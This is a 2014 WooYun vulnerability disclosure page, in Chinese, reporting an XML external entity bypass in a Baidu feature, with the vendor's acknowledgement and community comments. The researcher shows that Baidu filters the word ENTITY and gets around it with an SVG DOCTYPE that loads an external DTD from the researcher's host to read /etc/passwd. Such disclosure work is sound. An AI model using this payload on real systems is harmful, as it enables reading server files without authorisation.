当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-059783

漏洞标题:百度某功能XML实体注入(二)

相关厂商:百度

漏洞作者: gainover

提交时间:2014-05-07 15:56

修复时间:2014-06-21 15:57

公开时间:2014-06-21 15:57

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-07: 细节已通知厂商并且等待厂商处理中
2014-05-07: 厂商已经确认,细节仅向厂商公开
2014-05-17: 细节向核心白帽子及相关领域专家公开
2014-05-27: 细节向普通白帽子公开
2014-06-06: 细节向实习白帽子公开
2014-06-21: 细节向公众公开

简要描述:

嗯,回头看了看,想看看百度是怎么修复的,猜测了下百度的修复方式,然后就。。。绕过了。

详细说明:

1.首先试了试之前的测试代码,返回错误页面,那么百度是如何修复的呢?
2. 再看看是否允许定义空的DTD

<!DOCTYPE svg[  ]>


返回正常。
3. 加入ENTITY试试。。

<!DOCTYPE svg[<!ENTITY test "aaaaaaaaaaaaaaaa">]>


返回错误
4. 猜测,是否是过滤了 ENTITY 这个单词?

<text>aaaaa</text>


返回正常
在内容里插入 文字 ENTITY

<text>aaENTITYaaa</text>


返回错误
5. 看来,百度在这里对 ENTITY 这个单词进行了过滤。
6. 那么,可不可以不用ENTITY 这个单词来实现XXE呢?
答案是有的。
DTD 本身就支持调用外部的DTD文件,因此我们只需要在SVG里加一个外部的DTD,如下:

<!DOCTYPE svg SYSTEM "http://xsst.sinaapp.com/test/xxe_sys.dtd">


xxe_sys.dtd内容如下:

<!ENTITY test SYSTEM "file:///etc/passwd">


7. 这样我们又可以读取passwd内容了,如下图所示:

bdxxe.jpg

漏洞证明:

见详细说明。

修复方案:

光判断ENTITY这个词好像不靠谱,如果要从内容这个角度来过滤的话,还不如把DOCTYPE干掉吧!

版权声明:转载请注明来源 gainover@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-05-07 17:22

厂商回复:

感谢提交,我们会立即处理此问题。
--“百度,因你更安全”

最新状态:

暂无


漏洞评价:

评论

  1. 2014-05-07 15:57 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    其实只要在底层禁止这个就可以了

  2. 2014-05-07 15:57 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    然后就。。。绕过了

  3. 2014-05-07 16:00 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @xsser 哈哈,主要是我也没去研究过修复方案, 这里到是有一篇可供参考的,http://websec.io/2012/08/27/Preventing-XEE-in-PHP.html (Preventing XXE in PHP)

  4. 2014-05-07 16:19 | 卡卡 ( 普通白帽子 | Rank:447 漏洞数:52 | <script>alert('安全团队长期招人')</scrip...)

    二哥我要为你生二胎

  5. 2014-05-07 16:21 | Lonely ( 实习白帽子 | Rank:72 漏洞数:27 | 人生如梦,始终都游不过当局者迷的悲哀。)

    二哥 这是要抢生意啊 好好的 XSS 不玩 非来抢 注入。

  6. 2014-05-07 17:03 | xiaoL ( 普通白帽子 | Rank:361 漏洞数:67 | PKAV技术宅社区!Blog:http://www.xlixli....)

    特别喜欢...绕过了- -

  7. 2014-05-07 17:06 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    xss找到了么

  8. 2014-05-07 17:22 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    给力

  9. 2014-05-07 17:39 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  10. 2014-05-07 17:52 | Ares ( 路人 | Rank:29 漏洞数:8 | 来自幼儿园大班)

    mark

  11. 2014-05-08 06:09 | 小夜 ( 路人 | Rank:15 漏洞数:8 | 漫长的日子)

    好想看看xml实体注入是什么啊 求教 国内对这个好像还没有什么资料

  12. 2014-07-06 09:38 | mlyKnown ( 路人 | Rank:2 漏洞数:1 | 咚咚咚咚,查水表啦。)

    二哥,我竟然可以评价了

  13. 2014-07-07 00:54 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    你可知道,二哥就是这么屌

  14. 2014-10-06 00:11 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)

    两个都是不错的案例,受教了

  15. 2015-02-16 11:35 | 隐形人真忙 ( 路人 | Rank:16 漏洞数:6 | Hello hacker!)

    @小夜 http://blog.csdn.net/u011721501/article/details/43775691